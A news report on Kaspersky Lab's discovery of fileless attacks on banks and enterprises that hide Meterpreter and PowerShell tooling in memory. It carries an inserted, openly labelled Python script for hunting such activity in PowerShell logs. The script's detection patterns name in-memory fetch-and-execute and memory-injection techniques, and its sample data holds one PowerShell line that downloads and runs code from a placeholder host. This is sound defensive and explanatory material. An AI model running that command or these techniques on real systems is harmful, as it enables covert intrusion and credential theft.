Kaspersky Lab reveals Cybercriminals breach enterprises using hidden malware


Banks, telecommunication companies and government organisations in Africa, the US, South America and Europe are among the top targets, with the infamous GCMAN and Carbanak groups the primary suspects.

Kaspersky Lab experts have discovered a series of “invisible” targeted attacks that use only legitimate software: widely available penetration-testing and administration tools as well as the PowerShell framework for task automation in Windows – dropping no malware files onto the hard drive, but hiding in the memory. This combined approach helps to avoid detection by whitelisting technologies, and leaves forensic investigators with almost no artefacts or malware samples to work with. The attackers stay around just long enough to gather information before their traces are wiped from the system on the first reboot.

At the end of 2016, Kaspersky Lab experts were contacted by banks in the CIS that had found Meterpreter, a penetration-testing tool now often used for malicious purposes, in the memory of their servers where it was not supposed to be. Kaspersky Lab discovered that the Meterpreter code had been combined with a number of legitimate PowerShell scripts and other utilities.

The combined tools had been adapted into malicious code that could hide in the memory, invisibly collecting the passwords of system administrators so that the attackers could remotely control the victim’s systems. The ultimate goal appears to have been access to financial processes.
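One way a defender can hunt for the memory-resident PowerShell activity the article describes, as an added example that is not from Kaspersky Lab or the article: a Python scorer run over constructed PowerShell script-block log records (the shape of Windows event 4104 text), flagging scripts that obtain code in memory and execute it, or that call native memory APIs. The record fields, host and user names and the patterns themselves are assumptions for illustration.

```python
import re
from typing import Dict, List

# Coarse hunting heuristics for memory-only PowerShell tradecraft: code fetched
# or loaded in memory and executed without being written to disk. These are
# constructed for this example and are assumptions to tune per environment.
PATTERNS: Dict[str, re.Pattern] = {
    "remote_fetch": re.compile(r"\.Download(String|Data)\s*\(", re.I),
    "dynamic_invoke": re.compile(r"\b(IEX|Invoke-Expression)\b", re.I),
    "reflective_load": re.compile(r"\[(System\.)?Reflection\.Assembly\]::Load\b", re.I),
    "native_memory_api": re.compile(r"\b(VirtualAlloc|WriteProcessMemory|CreateRemoteThread)\b", re.I),
}

def indicators(script_text: str) -> List[str]:
    """Return the names of all patterns that match one script block, in PATTERNS order."""
    return [name for name, pat in PATTERNS.items() if pat.search(script_text)]

def is_suspicious(script_text: str) -> bool:
    """Flag a block when it both obtains code in memory (remote fetch or reflective
    load) and executes it, or when it touches native memory-management APIs."""
    hits = set(indicators(script_text))
    obtains = hits & {"remote_fetch", "reflective_load"}
    executes = hits & {"dynamic_invoke", "reflective_load"}
    return "native_memory_api" in hits or bool(obtains and executes)

def hunt(events: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Run the heuristics over script-block log records (assumed fields: host,
    user, script) and return the flagged records with their matched indicators."""
    return [dict(host=e["host"], user=e["user"], indicators=indicators(e["script"]))
            for e in events if is_suspicious(e["script"])]

# Constructed sample records in the shape of PowerShell script-block logging.
SAMPLE_EVENTS = [
    {"host": "srv01", "user": "ops\\jdoe", "script": "Get-Service | Where-Object {$_.Status -eq 'Stopped'}"},
    {"host": "srv02", "user": "ops\\svc-backup",
     "script": "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage')"},
    {"host": "srv03", "user": "ops\\admin",
     "script": "[System.Reflection.Assembly]::Load($bytes) | Out-Null; [Win32]::VirtualAlloc(0, $len, 0x3000, 0x40)"},
    {"host": "srv04", "user": "ops\\helpdesk", "script": "Get-Content C:\\logs\\app.log -Tail 50"},
]

if __name__ == "__main__":
    for finding in hunt(SAMPLE_EVENTS):
        print(finding)
```

Because script-block logging records the decoded script text, this catches in-memory staging that leaves no file on disk; a script that merely reads and runs a file from disk is deliberately not flagged, since that case leaves the artefacts the article says these attacks avoid.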

Kaspersky Lab has since uncovered that these attacks are happening on a massive scale: hitting more than 140 enterprise networks in a range of business sectors, with most victims located in the USA, France, Ecuador, Kenya, the UK and Russia.

Edited by: Darryl Linington